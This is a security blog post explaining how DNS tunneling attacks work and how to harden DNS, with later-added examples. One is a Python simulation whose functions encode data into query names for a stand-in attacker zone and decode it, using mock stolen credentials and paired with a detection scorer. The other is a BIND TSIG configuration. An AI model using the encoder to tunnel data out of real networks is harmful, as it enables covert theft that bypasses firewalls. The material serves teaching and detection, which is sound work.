Cyber Criminals Can Extract Data and Plant Malware With DNS Tunneling. Here's How

Gerhard Jacobs
February 21, 2019

Secure DNS is a key part of an organization's security posture, protecting both its online presence and its internal applications.

According to a 2018 report by DarkReading, the average cost of a DNS attack globally rose 57% between 2017 and 2018, to $715,000. Over the same period, organizations faced an average of seven DNS attacks each.

These attacks take many forms and have a variety of objectives. Some, such as DDoS, are designed to make DNS unavailable. Others, like cache poisoning, are designed to misdirect users to malicious websites. Still others do not attack DNS at all; they use it as a transport for stealing private data.

That last category is now one of the key trends in cybersecurity, and DNS tunneling is the technique bad actors most often use to get their hands on sensitive data over it.

In a previous post, we explained what a DNS hijacking attack is. This time around, we're looking at DNS tunneling.

What is DNS Tunneling?

In a DNS tunneling attack, hackers encode other traffic, such as a TCP or SSH session, a malware download or a file of stolen data, inside ordinary DNS queries and responses, so that it passes through firewalls that allow DNS. While not an attack on DNS itself, this form of attack uses DNS to get hold of your data.


In order to carry out a DNS tunneling attack, the compromised system has to be able to resolve names on the internet. Note that this does not require direct outbound connectivity: a host that can only talk to the corporate recursive resolver still tunnels fine, because the resolver forwards each query for the attacker's domain out to the internet on the host's behalf. That is exactly why the technique works on egress-filtered networks. On their side, bad actors need control of a registered domain and a server that acts as the authoritative name server for it, in order to run the server end of the tunnel and deliver the data payload.

Why DNS Tunneling Though?

Hackers know that DNS is a commonplace and trusted protocol, and it didn't take them long to figure out that a lot of organizations don't examine their DNS traffic for malicious activity at all. DNS tunneling lets these cybercriminals smuggle malware or stolen information inside DNS queries and responses, creating covert communication channels that bypass most firewalls.

Are all DNS tunneling activities nefarious? Good question. The answer is mostly, but there are exceptions to every rule: some security and telemetry products legitimately ship small amounts of data in DNS TXT lookups, so a detector needs an allowlist for those. What makes this form of attack attractive to hackers is how easy it is to get hold of tunneling toolkits. You can find a handful online, and they're so easy to use that an attacker doesn't need deep skills to carry out the attack. That said, DNS tunneling often makes up part of much larger, more sophisticated campaigns, some sponsored or directly carried out by nation states.

So, how do they do it?

  1. First off, the hacker registers a domain, say immahackyou.com.
  2. Next, they point the domain's NS records at a DNS server they control.
  3. They then delegate a subdomain, such as "tun.immahackyou.com", and configure their machine as the subdomain's authoritative DNS server.
  4. Any DNS request the victim makes for "{data}.tun.immahackyou.com" is passed by the victim's recursive resolver straight to the hacker's machine, with the outbound data encoded in the query name.
  5. Then it's just a matter of the bad actor's machine encoding its reply in the DNS response (tunneling tools typically use TXT, NULL, CNAME or MX records), which the resolver routes back to the victim's machine.
  6. Voila! A bidirectional data transfer channel is set, and all the firewall ever saw was DNS.
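The six steps above, and the "nobody examines DNS traffic" point from the previous section, as an added example that is not part of the original post and not code from any real tunneling tool. It is a self-contained simulation: the victim side packs a payload into query names under the article's hypothetical zone tun.immahackyou.com, the "authoritative server" side reassembles it and answers in TXT records, and a small scorer shows the features a resolver-log review would key on. The "<session>-<sequence>" header label and the thresholds in score_query are my own illustrative conventions, and the payload and benign names are constructed sample data.

```python
import base64
import math
from collections import Counter

# Hypothetical attacker zone, taken from the article's walkthrough.
TUNNEL_ZONE = "tun.immahackyou.com"
MAX_LABEL = 63   # RFC 1035: one label is at most 63 octets
MAX_NAME = 253   # RFC 1035: a whole name is at most 253 characters in text form
MAX_TXT = 255    # RFC 1035: one <character-string> in TXT rdata is at most 255 octets


def client_encode_queries(payload: bytes, session: str, zone: str = TUNNEL_ZONE) -> list:
    """Victim side: turn a payload into query names under the attacker's zone.

    Base32 rather than base64, because resolvers may change the case of a name
    in transit (0x20 randomisation, lowercasing) and base32 survives that.
    The leftmost label carries "<session>-<sequence>" (my own convention) so the
    server can reassemble fragments that arrive out of order."""
    text = base64.b32encode(payload).decode("ascii").rstrip("=").lower()
    labels = [text[i:i + MAX_LABEL] for i in range(0, len(text), MAX_LABEL)]
    queries, seq = [], 0
    while labels:
        header = f"{session}-{seq}"
        parts = [header]
        budget = MAX_NAME - len(header) - 1 - len(zone)  # room for ".<label>" pieces
        while labels and len(labels[0]) + 1 <= budget:
            label = labels.pop(0)
            parts.append(label)
            budget -= len(label) + 1
        if len(parts) == 1:
            raise ValueError("zone too long to fit even one data label")
        queries.append(".".join(parts + [zone]))
        seq += 1
    return queries


def server_decode_queries(queries: list, zone: str = TUNNEL_ZONE) -> dict:
    """Authoritative-server side: every query that reaches us for <zone> is data.
    Strip the zone, split off the header, reorder by sequence number and
    base32-decode. Returns {session: payload}."""
    fragments, suffix = {}, "." + zone
    for name in queries:
        if not name.lower().endswith(suffix):
            continue                                   # ordinary query, not ours
        labels = name[:-len(suffix)].split(".")
        if "-" not in labels[0]:
            continue                                   # malformed header, drop it
        session, seq = labels[0].rsplit("-", 1)
        fragments.setdefault(session, {})[int(seq)] = "".join(labels[1:])
    payloads = {}
    for session, parts in fragments.items():
        text = "".join(parts[i] for i in sorted(parts)).upper()
        text += "=" * (-len(text) % 8)                 # restore the padding we stripped
        payloads[session] = base64.b32decode(text)
    return payloads


def server_encode_response(data: bytes) -> list:
    """Server -> victim: the reply rides in TXT rdata. TXT is 8-bit clean, but each
    string is capped at 255 octets, so the base64 text is split accordingly."""
    text = base64.b64encode(data).decode("ascii")
    return [text[i:i + MAX_TXT] for i in range(0, len(text), MAX_TXT)]


def client_decode_response(txt_strings: list) -> bytes:
    return base64.b64decode("".join(txt_strings))


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def score_query(name: str) -> dict:
    """What a resolver-log review looks for: the part left of the registered domain
    is unusually long, has very long labels, or looks like encoded data (high
    entropy). The registered domain is approximated as the last two labels; a
    production detector would use the Public Suffix List. Thresholds are illustrative."""
    labels = name.rstrip(".").lower().split(".")
    subdomain = "".join(labels[:-2])
    longest = max((len(l) for l in labels[:-2]), default=0)
    entropy = shannon_entropy(subdomain)
    suspicious = len(name) > 100 or longest > 40 or entropy > 4.0
    return {"name": name, "length": len(name), "longest_label": longest,
            "entropy": round(entropy, 2), "suspicious": suspicious}


if __name__ == "__main__":
    # Constructed sample data: something a credential stealer might exfiltrate.
    stolen = ("user=admin;pass=hunter2;host=fileserver01.corp.local;" * 6).encode()
    queries = client_encode_queries(stolen, "s1")
    print(f"{len(queries)} queries carry {len(stolen)} bytes")
    assert server_decode_queries(queries)["s1"] == stolen
    for q in queries + ["www.example.com", "cdn-static-01.akamaihd.net"]:
        print(score_query(q))
    print(client_decode_response(server_encode_response(b"run: whoami")))
```

Two things worth noticing when you run it: the tunnel queries are flagged on length and label size alone, before entropy enters into it, and the plain-DNS queries mixed into the same list are silently ignored by the server side, which is why an attacker's zone can sit unnoticed among millions of legitimate lookups in your resolver logs.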

DNS Security Best Practices to Help Keep You Safe

The practices below harden the DNS infrastructure you operate. None of them stops a tunnel running through your resolvers by itself; for that you still need to log and inspect outbound query traffic, as described above.

Use DNSSEC

DNSSEC signs your zone data so that validating resolvers can verify that the answers they receive really came from you and were not altered in transit, which defends against cache poisoning and spoofed responses. Next-generation DNS allows you to implement DNSSEC using "online signing," so you can still optimize the end-user experience, manage multiple CDN providers and migrate to the cloud while your zones stay protected. Be aware that DNSSEC complicates a redundant, dual-provider DNS architecture, because both providers must serve signatures that validate against the same published keys. Although modern managed DNS services are designed for high availability, they are not immune from outages; full or partial outages can result from denial-of-service attacks, failures in critical network infrastructure, or configuration errors (an expired signature is a common one). The result of a DNS outage is that your applications and content are no longer available to users.

DDoS Protection For The DNS Layer

DDoS attacks against DNS infrastructure are common and can result in prolonged outages. If you run your own DNS infrastructure, make sure you:

  • Protect against volumetric DDoS attacks that deny access by overwhelming network links. DDoS protection services can help by absorbing large amounts of malicious traffic upstream from your network links.
  • Protect against application-level DNS attacks, such as the random subdomain attack. There are specialized appliances that provide DNS application layer protections.
  • Overprovision your DNS infrastructure to absorb traffic spikes.

Strong Access Controls for DNS Administration

Because DNS is a mission-critical service, administrative access to DNS management should be effectively managed. There are several recommended measures for securing administrative access to DNS systems:

  • Strong password enforcement
  • Two-Factor Authentication
  • Role-based access controls (RBAC)
  • Admin session timeouts and forced re-login
  • IP address whitelisting - restricting admin access to trusted sources
  • Single Sign-On (SSO)
  • Activity logging

Leveraging Anycast for High Availability

DNS infrastructure based on anycast is another way to achieve high availability and resiliency. Anycast is not a protocol in its own right: the same IP prefix is announced over BGP from several locations, so when a recursive resolver sends a query to an authoritative name server, internet routing delivers it to whichever instance is topologically closest to the resolver. This improves performance and provides a faster and more reliable response in case of a name server outage.

Anycast is a highly resilient routing method. As soon as servers go down, are impacted by DDoS or become unavailable due to global connectivity issues (e.g. a cut fiber or congestion in a certain Internet segment), anycast dynamically diverts DNS requests to an available server. The caveat is that the diversion only happens when the failing site stops announcing the prefix; a site that is reachable but unhealthy keeps attracting queries, so health checks must be tied to route withdrawal.

Implement Redundant DNS

DNS redundancy is now a must-have for many enterprises, but deploying a redundant DNS infrastructure often involves trade-offs in cost, manageability, and performance. You might find yourself cobbling together management of different vendors and settling for minimally viable, common features shared between the vendors.

Secure Zone Transfers with TSIG Authentication

When operating a secondary DNS zone, zone data is regularly copied from the primary to the secondary server; this is called a zone transfer. An attacker who can impersonate the primary or tamper with the transfer in transit could inject fake DNS records into the secondary server, as part of a DNS spoofing attack. TSIG (Transaction Signature, RFC 8945) is a DNS extension that protects zone transfers and other DNS transactions such as NOTIFY and dynamic updates. TSIG uses a shared secret key and an HMAC, not a public-key digital signature, to authenticate each DNS message: the primary appends an HMAC over the message (including a timestamp, which limits replay) and the secondary recomputes it with the same key. This validates that the source of the zone transfer is the legitimate primary and that the zone transfer itself was not altered in transit. Note that TSIG authenticates but does not encrypt; the zone contents are still readable on the wire, and both servers need clocks that agree to within the TSIG fudge window (300 seconds by default).
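What the setup described above looks like in BIND 9, as an added example that is not from the original post. The key name, addresses, zone name and file paths are placeholders; the secret must be the one tsig-keygen prints, never a hand-typed value.

```conf
# Generate the shared secret once (BIND 9.11 or later ships tsig-keygen):
#   tsig-keygen -a hmac-sha256 xfer-key.example.com
# and paste the resulting key statement into named.conf on BOTH servers.

key "xfer-key.example.com" {
    algorithm hmac-sha256;
    secret "<base64 secret exactly as printed by tsig-keygen>";
};

# ---- primary (192.0.2.1) ----
zone "example.com" {
    type primary;
    file "/var/named/example.com.zone";
    # Only a party holding the key may transfer the zone. As a side effect this
    # also shuts down casual AXFR enumeration of every record you publish.
    allow-transfer { key "xfer-key.example.com"; };
    also-notify { 192.0.2.2; };
};

# ---- secondary (192.0.2.2) ----
# Sign every message sent to the primary (SOA refresh, AXFR/IXFR) with the key,
# and verify the primary's signed replies with it.
server 192.0.2.1 {
    keys { "xfer-key.example.com"; };
};

zone "example.com" {
    type secondary;
    primaries { 192.0.2.1; };
    file "/var/named/example.com.saved";
};
```

The `primary`, `secondary` and `primaries` keywords are the BIND 9.16+ spellings; older releases use `master`, `slave` and `masters` with the same semantics. Use one key per primary/secondary pair rather than one shared across your whole fleet, so that compromising one secondary does not let an attacker push a zone to the others, and keep `allow-transfer` restricted to the key rather than to an IP address alone, since source addresses are trivially spoofed over UDP and AXFR's TCP handshake is no substitute for authentication.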

Outsourcing DNS to an external provider does relieve an organization of some security responsibilities. Ultimately though, IT and security teams should have a basic understanding of DNS security and the best practices for defending DNS from the wide variety of attacks that can be directed at it.
